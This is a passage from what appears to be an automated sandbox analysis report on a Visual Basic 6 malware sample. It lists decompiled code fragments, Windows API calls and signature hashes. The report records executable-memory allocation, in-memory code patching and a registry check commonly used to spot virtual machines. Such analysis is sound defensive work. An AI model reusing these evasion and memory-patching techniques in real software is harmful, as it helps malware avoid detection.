							 *((intOrPtr*)(_t98 - 1)) =  *((char*)(_t95 + 1)) + _t104 - 3 - _t98;
							_t98 = _t98 + 3;
						}
					}
				}
				 *0x4410b4 =  *0x4410b4 + _t82 + 5;
				asm("stosb");
				asm("stosd");
				 *0x4410a4 = _v36;
				asm("stosb");
				 *0x4410a8 = E00424EE7;
				asm("stosd");
				 *0x4410ac = _v28;
				_v12 = 5;
				_t66 = NtProtectVirtualMemory(0xffffffff,  &_v36,  &_v12, _v8,  &_v8);
				 *0x4410b8 =  *0x4410b8 + 1;
				return _t66;
			}

0x00424d24
0x00424d2b
0x00424d37
0x00424d46
0x00424d4c
0x00424d5c
0x00424d64
0x00424d74
0x00424d7c
0x00424d87
0x00424d8c
0x00424d8f
0x00424d99
0x00424db1
0x00424db7
0x00000000
0x00000000
0x00000000
0x00000000
0x00424db7
0x00424dbe
0x00424dbe
0x00424dc9
0x00424ddc
0x00424de2
0x00000000
0x00000000
0x00424de9
0x00424deb
0x00424dee
0x00424df1
0x00424dfd
0x00424dfe
0x00424e04
0x00424e06
0x00424e06
0x00424e06
0x00424e08
0x00424e0a
0x00424e0d
0x00424e13
0x00424e22
0x00424e27
0x00424e2a
0x00424e45
0x00424e66
0x00424e7a
0x00424e7a
0x00424e4c
0x00424e56
0x00424e5d
0x00424e60
0x00424e60
0x00424e2c
0x00424e36
0x00424e3a
0x00424e3d
0x00424e3d
0x00424e2a
0x00424e7d
0x00424e85
0x00424e8d
0x00424e95
0x00424e99
0x00424ea1
0x00424ea5
0x00424eb6
0x00424eba
0x00424ec0
0x00424ed8
0x00424edb
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen), ref: 00424DB1
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen,00424A46), ref: 00424DDC
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen,00424A46), ref: 00424ED8

Strings

SysAllocStringByteLen, xrefs: 00424D3C, 00424D51, 00424D69, 00424D81

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$Protect$Allocate
String ID: SysAllocStringByteLen
API String ID: 955180148-3231582829
Opcode ID: 6cddefd924ae0c1d68a6b5b50f2b9215894dde9c8131c269a689499118219c13
Instruction ID: 186858c1b5fbc58f6b11677d7c5534809b691d42dc709c99a1644f3a1e9ee1bc
Opcode Fuzzy Hash: 6cddefd924ae0c1d68a6b5b50f2b9215894dde9c8131c269a689499118219c13
Instruction Fuzzy Hash: 2D510575A002259FEB10DFA4EC41FEEB7B5FBC5324F90435BE110A61E4D37856808B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00425E30, Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 724COMMON

Download Yara Rule

APIs

Part of subcall function 00424D1A: NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,SysAllocStringByteLen,004249BB,?,SysAllocStringByteLen,004249D5,?,SysAllocStringByteLen,004249A4,SysAllocStringByteLen), ref: 00424DB1

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 00425F88
__vbaVarMove.MSVBVM60 ref: 00425FB9
__vbaVarMove.MSVBVM60 ref: 00425FE4
#644.MSVBVM60(?), ref: 00425FFD
__vbaVarMove.MSVBVM60 ref: 00426026
__vbaVarMove.MSVBVM60 ref: 0042604F
__vbaErase.MSVBVM60(00000000,?), ref: 00426076

Part of subcall function 00427AD0: RtlMoveMemory.KERNEL32(00000004,004291B0,00000004,004291B0,?,?,?,00426081), ref: 00427AFF

#644.MSVBVM60(00000030), ref: 0042608E
#644.MSVBVM60(?), ref: 0042609A
__vbaObjSetAddref.MSVBVM60(?,?,?,00000000), ref: 004260B1
#644.MSVBVM60(00000000), ref: 004260B8
__vbaFreeObj.MSVBVM60 ref: 004260CA
__vbaObjSetAddref.MSVBVM60(?,?,?,?), ref: 004260E9

Part of subcall function 00427B30: __vbaObjSetAddref.MSVBVM60(?,004260F5,66106AEE,00000001,660DC30A), ref: 00427BB1
Part of subcall function 00427B30: __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427BD8
Part of subcall function 00427B30: __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427BE6
Part of subcall function 00427B30: __vbaAryMove.MSVBVM60(0040100A,?,00000000), ref: 00427BFF
Part of subcall function 00427B30: __vbaFreeObj.MSVBVM60 ref: 00427C0E
Part of subcall function 00427B30: __vbaObjSetAddref.MSVBVM60(?,?), ref: 00427C18
Part of subcall function 00427B30: __vbaAryMove.MSVBVM60(0040100E,?,00000000), ref: 00427C31
Part of subcall function 00427B30: __vbaFreeObj.MSVBVM60 ref: 00427C3A

__vbaFreeObj.MSVBVM60(00000000), ref: 004260FD
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,?,?), ref: 004262F2
__vbaVarMove.MSVBVM60 ref: 00426321
__vbaErase.MSVBVM60(00000000,?), ref: 00426348
__vbaAryLock.MSVBVM60(?,?), ref: 00426386
__vbaStrMove.MSVBVM60(25FF0044), ref: 004263B0
__vbaStrMove.MSVBVM60 ref: 004263BC
__vbaAryLock.MSVBVM60(?,?), ref: 004263C6
__vbaStrMove.MSVBVM60 ref: 004263E3
__vbaStrMove.MSVBVM60(00000000), ref: 004263EF
__vbaStrCat.MSVBVM60(00000000), ref: 004263F2
__vbaStrMove.MSVBVM60 ref: 004263FD
__vbaStrCat.MSVBVM60(?,00000000), ref: 00426403
__vbaStrMove.MSVBVM60(?,00000000), ref: 0042640E
__vbaStrCat.MSVBVM60(?,00000000,?,00000000), ref: 00426415
__vbaStrMove.MSVBVM60(?,00000000), ref: 00426420
__vbaAryUnlock.MSVBVM60(?,?,00401016,?,00000000), ref: 00426449
__vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,00000000), ref: 0042647B
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000), ref: 004264A5
__vbaVarMove.MSVBVM60 ref: 004264E2
__vbaVarMove.MSVBVM60 ref: 0042651C
__vbaStrMove.MSVBVM60(?), ref: 0042652C
__vbaStrMove.MSVBVM60(00000000), ref: 00426539
__vbaStrCat.MSVBVM60(00000000), ref: 0042653C
__vbaStrMove.MSVBVM60 ref: 00426547
__vbaStrCat.MSVBVM60(?,00000000), ref: 0042654D
__vbaStrMove.MSVBVM60(?,00000000), ref: 00426558
__vbaStrCat.MSVBVM60(?,00000000,?,00000000), ref: 0042655F
__vbaStrMove.MSVBVM60(?,00000000), ref: 0042656A
#644.MSVBVM60(00000000,?,00000000), ref: 0042656D
__vbaVarMove.MSVBVM60(?,00000000), ref: 0042659B
__vbaVarMove.MSVBVM60(?,00000000), ref: 004265C1
__vbaVarMove.MSVBVM60(?,00000000), ref: 004265EE
__vbaVarZero.MSVBVM60(?,00000000), ref: 0042661E

Part of subcall function 00428A60: __vbaStrMove.MSVBVM60(S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*,66106AEE,00000000,660DC30A), ref: 00428ABB
Part of subcall function 00428A60: #644.MSVBVM60(00000000), ref: 00428ABE
Part of subcall function 00428A60: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,?), ref: 00428AD7
Part of subcall function 00428A60: __vbaFreeStr.MSVBVM60 ref: 00428AEF
Part of subcall function 00428A60: #526.MSVBVM60(?,000000FF), ref: 00428B03
Part of subcall function 00428A60: __vbaStrVarMove.MSVBVM60(?), ref: 00428B0D
Part of subcall function 00428A60: __vbaStrMove.MSVBVM60 ref: 00428B18
Part of subcall function 00428A60: __vbaStrCopy.MSVBVM60 ref: 00428B22
Part of subcall function 00428A60: __vbaFreeStr.MSVBVM60 ref: 00428B2B
Part of subcall function 00428A60: __vbaFreeVar.MSVBVM60 ref: 00428B30
Part of subcall function 00428A60: #644.MSVBVM60(004026B8), ref: 00428B3B
Part of subcall function 00428A60: #644.MSVBVM60 ref: 00428B4C
Part of subcall function 00428A60: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00428B76

__vbaErase.MSVBVM60(00000000,?,?,00000000), ref: 00426649
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000), ref: 00426665
__vbaAryUnlock.MSVBVM60(?), ref: 00426675
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 004266C3
__vbaVarZero.MSVBVM60 ref: 004266F1
__vbaErase.MSVBVM60(00000000,?), ref: 0042671C
__vbaAryLock.MSVBVM60(?,?), ref: 0042672A
__vbaAryUnlock.MSVBVM60(?,00401016,?), ref: 00426751

Part of subcall function 00426950: #595.MSVBVM60(?,?,?,?,?,66106AEE,00000000,660DC30A), ref: 004269BC
Part of subcall function 00426950: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004269CC

__vbaAryUnlock.MSVBVM60(?,004267E4), ref: 004267AC
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004267BE
__vbaFreeObj.MSVBVM60 ref: 004267C3
__vbaAryDestruct.MSVBVM60(00402538,?), ref: 004267D2
__vbaRecDestruct.MSVBVM60(0040250C,?), ref: 004267DD

Strings

0, xrefs: 00426163
0, xrefs: 00425FF3
", xrefs: 00425FBE

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Move$Free$#644$Addref$EraseRedimUnlock$DestructListLock$MemoryZero$#526#595AllocateCheckCopyHresultOpenQueryValueVirtual
String ID: "$0$0
API String ID: 4061916490-2703853450
Opcode ID: f040bc80197da2db2c9761bf1817f93a5d3ce4adea289ff5ff534c43862ae82a
Instruction ID: 86e00919e1b76a044ed6b50e5e7fc8d3ec1c1d8c878bde6ba15d377ae4325955
Opcode Fuzzy Hash: f040bc80197da2db2c9761bf1817f93a5d3ce4adea289ff5ff534c43862ae82a
Instruction Fuzzy Hash: 1C429F70A002299FDB14DFA8DC84FEEB7B5FB48304F508659E60AAB281DB74A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00427E0E, Relevance: 107.2, APIs: 71, Instructions: 660COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427E24
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00427E42
__vbaAryLock.MSVBVM60(?,?), ref: 00427E55
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427E8A
__vbaAryUnlock.MSVBVM60(?), ref: 00427E98
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427F06
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00427F31
__vbaAryLock.MSVBVM60(?,?), ref: 00427F3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427F6D
__vbaAryUnlock.MSVBVM60(?), ref: 00427F79
__vbaAryLock.MSVBVM60(?,?), ref: 00427FC0
#644.MSVBVM60(00401006), ref: 00427FD4
__vbaAryUnlock.MSVBVM60(?), ref: 00427FDD
#644.MSVBVM60(?,?,?,?), ref: 00428005
#644.MSVBVM60(?), ref: 0042800D
__vbaAryLock.MSVBVM60(?,?), ref: 00428026
#644.MSVBVM60(00401006), ref: 00428034
__vbaAryUnlock.MSVBVM60(?), ref: 0042803D
#644.MSVBVM60(?,?,?,?), ref: 00428069
#644.MSVBVM60(?), ref: 00428071
__vbaRedim.MSVBVM60(00000000,00000014,00000000,00402538,00000001,660DDE98,00000000,00000000,00000000), ref: 0042809B
__vbaAryLock.MSVBVM60(?,?,00000000,00000000), ref: 004280C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,00000000,00000000), ref: 00428112
__vbaVarDup.MSVBVM60(?,?,00000000,00000000), ref: 0042812C
#607.MSVBVM60(?,?,?,?,?,00000000,00000000), ref: 00428143
__vbaStrVarMove.MSVBVM60(?,?,?,00000000,00000000), ref: 00428153
__vbaStrMove.MSVBVM60(?,?,00000000,00000000), ref: 0042815A
__vbaStrCopy.MSVBVM60(?,?,00000000,00000000), ref: 00428164
__vbaFreeStr.MSVBVM60(?,?,00000000,00000000), ref: 0042816D
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000000,00000000), ref: 0042817D
#644.MSVBVM60(?,?,?,00000000), ref: 00428189
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,00000000), ref: 004281B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,00000000), ref: 004281E1
__vbaVarDup.MSVBVM60(?,?,?,00000000), ref: 004281FB
#607.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00428212
__vbaStrVarMove.MSVBVM60(?,?,?,?,00000000), ref: 0042821F
__vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 0042822C
__vbaStrCopy.MSVBVM60(?,?,?,00000000), ref: 00428232
__vbaFreeStr.MSVBVM60(?,?,?,00000000), ref: 0042823B
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000), ref: 0042824B
#644.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00428257
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,00000000), ref: 00428284
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,00000000), ref: 004282AF
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,00000000), ref: 004282C9
#607.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000), ref: 004282E0
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 004282ED
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00000000), ref: 004282F8
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00000000), ref: 004282FE
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00428307
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000000), ref: 00428317
#644.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000), ref: 00428323
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,?,?,?,00000000), ref: 00428350
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,?,?,?,00000000), ref: 0042837B
__vbaRedim.MSVBVM60(00000080,00000001,660DDE88,00000011,00000001,-00000001,00000000), ref: 0042839A
__vbaAryLock.MSVBVM60(?,00000000), ref: 004283AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004283DE
__vbaAryUnlock.MSVBVM60(?), ref: 004283E8
__vbaAryUnlock.MSVBVM60(?,?,00000000,00000000), ref: 004283FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,00000000,00000000), ref: 0042843A
__vbaRedim.MSVBVM60(00000080,00000001,660DDE88,00000011,00000001,-00000001,00000000,?,00000000,00000000), ref: 00428459
__vbaAryLock.MSVBVM60(?), ref: 00428469
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00428499
__vbaAryUnlock.MSVBVM60(?), ref: 004284A3
__vbaAryUnlock.MSVBVM60(?,0042853B,00000000,00000000), ref: 004284F3
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428508
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428513
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042851B
__vbaFreeObj.MSVBVM60 ref: 00428526
__vbaFreeObj.MSVBVM60 ref: 0042852B
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428533
__vbaFreeObj.MSVBVM60 ref: 00428538

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$#644Free$Unlock$Lock$Move$Redim$Destruct$#607CopyList
String ID:
API String ID: 2004746901-0
Opcode ID: 153591f5f44fa1042e702eda37d4e6fe253548bdd5d38203646c8357d40971f8
Instruction ID: 744f66916a39f7783c06a1d81a2cf47643e6e5d090e629ec48fae43e67e35d98
Opcode Fuzzy Hash: 153591f5f44fa1042e702eda37d4e6fe253548bdd5d38203646c8357d40971f8
Instruction Fuzzy Hash: 70326C75A00219AFDB14DFA4DC88FAEB779FF88700F108519F605A7291DB74A906CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00427B30, Relevance: 43.8, APIs: 29, Instructions: 266COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,004260F5,66106AEE,00000001,660DC30A), ref: 00427BB1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427BD8
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00427BE6
__vbaAryMove.MSVBVM60(0040100A,?,00000000), ref: 00427BFF
__vbaFreeObj.MSVBVM60 ref: 00427C0E
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00427C18
__vbaAryMove.MSVBVM60(0040100E,?,00000000), ref: 00427C31
__vbaFreeObj.MSVBVM60 ref: 00427C3A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427C6D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427CA4
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427CCF
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00427CDD
__vbaStrMove.MSVBVM60(00000000), ref: 00427CEA
__vbaStrCopy.MSVBVM60 ref: 00427CF5
__vbaFreeStr.MSVBVM60 ref: 00427CFE
__vbaFreeObj.MSVBVM60 ref: 00427D07
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00427D16

Part of subcall function 00427230: __vbaObjSetAddref.MSVBVM60(?,00440248,660DA008,00401006,660D9FAF), ref: 0042727B
Part of subcall function 00427230: __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004272A6
Part of subcall function 00427230: __vbaVarDup.MSVBVM60 ref: 004272D6
Part of subcall function 00427230: #607.MSVBVM60(?,?,?), ref: 004272E8
Part of subcall function 00427230: __vbaStrVarMove.MSVBVM60(?), ref: 004272F2
Part of subcall function 00427230: __vbaStrMove.MSVBVM60 ref: 004272FD
Part of subcall function 00427230: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042730D
Part of subcall function 00427230: #644.MSVBVM60(?), ref: 0042731A
Part of subcall function 00427230: __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427346
Part of subcall function 00427230: __vbaStrCopy.MSVBVM60 ref: 00427352

__vbaStrMove.MSVBVM60(00000000), ref: 00427D23
__vbaStrCopy.MSVBVM60 ref: 00427D2E
__vbaFreeStr.MSVBVM60 ref: 00427D37
__vbaFreeObj.MSVBVM60 ref: 00427D40
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00427D4A

Part of subcall function 00427230: __vbaFreeObj.MSVBVM60(00427395), ref: 00427385
Part of subcall function 00427230: __vbaFreeStr.MSVBVM60 ref: 0042738E

__vbaStrMove.MSVBVM60(00000000), ref: 00427D57
__vbaStrCopy.MSVBVM60 ref: 00427D62
__vbaFreeStr.MSVBVM60 ref: 00427D6B
__vbaFreeObj.MSVBVM60 ref: 00427D74
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427DA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427DD0
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427DFD

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$AddrefMove$Copy$#607#644List
String ID:
API String ID: 396651317-0
Opcode ID: 145610fcd768e4ac687bef1bbac0b3a12a9f02353e6ee43d3d8d9f1a3e723c88
Instruction ID: 16b4e1fc49f31db2ab390fff2638afb463198140df93a6698613074e770b1dcf
Opcode Fuzzy Hash: 145610fcd768e4ac687bef1bbac0b3a12a9f02353e6ee43d3d8d9f1a3e723c88
Instruction Fuzzy Hash: 19A109B0A00219AFDB14DFA5DC88EEEB7B9FF48704F10852DE105A7291DA74A906CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00425BB0, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

#644.MSVBVM60(?,0043EC52), ref: 00425C0F
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,00000000,00000000,00000004), ref: 00425C2B
__vbaVarMove.MSVBVM60 ref: 00425C57
__vbaVarZero.MSVBVM60 ref: 00425C80
__vbaVarMove.MSVBVM60 ref: 00425CA8
__vbaVarMove.MSVBVM60 ref: 00425CC8
__vbaErase.MSVBVM60(00000000,?), ref: 00425CF0
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00425D16
__vbaAryLock.MSVBVM60(?,?), ref: 00425D2D
#644.MSVBVM60(00401006), ref: 00425D3B
__vbaAryUnlock.MSVBVM60(?), ref: 00425D4A
__vbaAryLock.MSVBVM60(?,?,?,?,?,?), ref: 00425D71
#644.MSVBVM60(00401006), ref: 00425D7F
__vbaAryUnlock.MSVBVM60(?), ref: 00425D88
#644.MSVBVM60(?,?,?,?), ref: 00425DA1
__vbaAryLock.MSVBVM60(?,00000000,?,?,?,?), ref: 00425DB7
#644.MSVBVM60(00401006,?,?,?,?), ref: 00425DC5
__vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 00425DCD
__vbaAryDestruct.MSVBVM60(00000000,?,00425E15), ref: 00425E0E

Strings

@, xrefs: 00425CB2

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$#644$LockMoveUnlock$Redim$DestructEraseZero
String ID: @
API String ID: 2967634309-2766056989
Opcode ID: 4e33aa18696da9503c46330b293356eaa7403d4dd31ad711987bd3a6cb1b008d
Instruction ID: 00a7e5cf3a77dbd8ebb5c0c6362565eca3665e0b721be8cc8f6c39241d0a2e64
Opcode Fuzzy Hash: 4e33aa18696da9503c46330b293356eaa7403d4dd31ad711987bd3a6cb1b008d
Instruction Fuzzy Hash: E9813EB4E102189FDB14DFA9D895EEEBBB9FF48710F10811AE505A7351D774A900CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425800, Relevance: 31.7, APIs: 21, Instructions: 191COMMON

Download Yara Rule

APIs

__vbaUbound.MSVBVM60(00000001), ref: 00425857
#644.MSVBVM60(?), ref: 0042586D
__vbaAryLock.MSVBVM60(?), ref: 0042587D
#644.MSVBVM60(00401006), ref: 0042588B
__vbaAryUnlock.MSVBVM60(?), ref: 0042589A
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,?,00000004), ref: 004258C1
__vbaAryLock.MSVBVM60(?,?), ref: 004258D2
#644.MSVBVM60(00401006), ref: 004258E0
__vbaAryUnlock.MSVBVM60(?), ref: 004258E9
__vbaAryLock.MSVBVM60(?,?), ref: 004258F3
#644.MSVBVM60(00401002), ref: 00425904
__vbaAryUnlock.MSVBVM60(?), ref: 0042590D
#644.MSVBVM60(?), ref: 00425913

Part of subcall function 00425A20: __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000,660DC6D9,660DDE99,660DC6FC), ref: 00425A71
Part of subcall function 00425A20: __vbaVarMove.MSVBVM60 ref: 00425A9B
Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425ACB
Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425AEA
Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425B09
Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425B28
Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425B4B

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,?,?,?,?,?), ref: 00425979
__vbaAryLock.MSVBVM60(?), ref: 0042598C
#644.MSVBVM60(00401006), ref: 0042599A
__vbaAryUnlock.MSVBVM60(?), ref: 004259A3
__vbaAryLock.MSVBVM60(?,?), ref: 004259AD
#644.MSVBVM60(00401006), ref: 004259BB
__vbaAryUnlock.MSVBVM60(?), ref: 004259C3
__vbaAryDestruct.MSVBVM60(00000000,?,00425A01,?,?,?,?,?,?), ref: 004259FA

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$#644$LockUnlockZero$Redim$DestructMoveUbound
String ID:
API String ID: 2865909624-0
Opcode ID: 06778fd73ec9b68f935005e32d6c64f5ed8663905b9e807cd6ef3239fc65ba1d
Instruction ID: 01b79bd141939e94202fd500e342226d32754c31532d5c3b05481bc64f11db5d
Opcode Fuzzy Hash: 06778fd73ec9b68f935005e32d6c64f5ed8663905b9e807cd6ef3239fc65ba1d
Instruction Fuzzy Hash: 06710AB5E10208AFDB04DFA8DD85EEEBBB9FF88710F10811AE505A7254D774A941CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00428DE0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00428DE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				int _v160;
				void* _t40;
				int _t42;
				int _t44;
				void* _t48;
				void* _t52;
				intOrPtr* _t70;
				void* _t71;
				void* _t73;
				void* _t76;
				intOrPtr _t77;

				_t77 = _t76 - 8;
				_push(0x401006);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t77;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = _t77 - 0x9c;
				_v8 = 0x440320;
				_v28 = 0;
				_v44 = 0;
				_v60 = 0;
				_v76 = 0;
				_v92 = 0;
				_v160 = 0x16;
				_t40 = E00428F70(0, __edi, __esi,  &_v160); // executed
				_t73 = _t40;
				_v24 = _t73;
				if(_t73 == 0) {
					__imp__#685();
					__imp____vbaObjSet( &_v28, _t40);
					_t71 = _t40;
					_v92 = 0xa;
					_v76 = 0xa;
					_v60 = 0xa;
					_v44 = 0xa;
					_v84 = 0x80020004;
					_v68 = 0x80020004;
					_v52 = 0x80020004;
					_v36 = 0x80020004;
					_t52 =  *((intOrPtr*)( *_t71 + 0x44))(_t71, 7,  &_v44,  &_v60,  &_v76,  &_v92);
					asm("fclex");
					if(_t52 < 0) {
						__imp____vbaHresultCheckObj(_t52, _t71, 0x403088, 0x44);
					}
					__imp____vbaFreeObj();
